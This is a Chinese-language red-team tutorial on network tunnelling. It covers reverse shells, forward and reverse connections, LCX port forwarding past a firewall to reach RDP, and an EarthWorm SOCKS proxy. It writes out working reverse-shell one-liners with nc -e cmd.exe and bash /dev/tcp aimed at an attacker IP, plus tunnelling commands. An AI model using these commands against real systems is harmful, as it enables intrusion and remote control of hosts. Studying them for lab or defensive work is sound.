16.隧道通信技术
隧道通信技术
隧道技术在HVV中的作用
攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透,但现在的内部网络大多部署了很多安全设各,网络结构错综复杂,对于某些系统的访问会受 到各种阻挠,这就需要借助代理去突破这些限制,因此面对不同的网络环境对于代理的选择及使用显得格外重要。
隧道的基本概念
1、反弹shell
反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制,导致无法持续控制目标,或执行命令受阻等情况时需要进行反弹Shell
2、端口转发
若攻克的边界主机可访问外网,则可以考虑使用端口转发进行内网穿透,端口转发就是将一个端口转发到另一个端口 例如:由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接 是不可以的,就需要使用进行端口转发
3、正向连接、反向连接
正向连接,反向连接的概念取决于谁主动连接谁
比如如下:
攻击者主动连接受害者,那就是正向连接
受害者主动连接攻击者,那就是反向连接
4、协议隧道
当我们去搭建隧道的时候,通常使用不同的协议来躲避检测,常见的有 HTTP隧道,SOCKS隧道,DNS隧道,ICMP隧道,SSH隧道等等。
反弹shell的方式
反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制,导致无法持续控制目标,或执行命令受阻等情况时需要进行反弹Shell
常见反弹SHELL方式:
1、Bash反弹shell
2、NC反弹shell
3、python反弹shell
NC反弹shell
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。
正向反弹:
1、在靶机上运行:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe
2、在攻击机上运行nc 192.168.18.244 1111
反向反弹:
1、在攻击者机器运行 nc -lvvp 1111 监听1111端口
2、nc -e C:\Windows\System32\cmd.exe 192.168.18.128 1111
Bash反弹shell
Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell
bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&1
bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&2
bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&1
bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&2
1、在攻击者机器运行 nc -lvvp 1111 监听1111端口
2、在靶机上运行 bash -i >& /dev/tcp/ip/1111 0>&1
端口转发
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制
端口转发:
Lcx -listen<监听slave请求的端口><等待连接的端口>
Lcx -slave<攻击机ip><监听端口><目标ip><目标端口>
1、由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发
2、在攻击机器上运行 lcx -listen 1111 2222 ,监听1111端口并且转发到2222端口
3、在靶机上运行 lcx -slave 192.168.142.1 1111 127.0.0.1 3389 将本地的3389端口转发到192.168.142.1的 1111端口
4、在攻击机器上进行连接 127.0.0.1:2222
应用层代理
socks隧道
常见的代理工具有 regeorg,FRP,EW,NPS,Termite,通过上述的代理,配合代理客户端实现内网漫游。
EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透EW可以已正向和反向以及多级级联的方式建立网络隧道。
正向代理
在中间靶机上运行:/ew -s ssocksd -l 1080
热门相关:最强狂兵 人间欢喜 仗剑高歌 第一神算:纨绔大小姐 豪门闪婚:帝少的神秘冷妻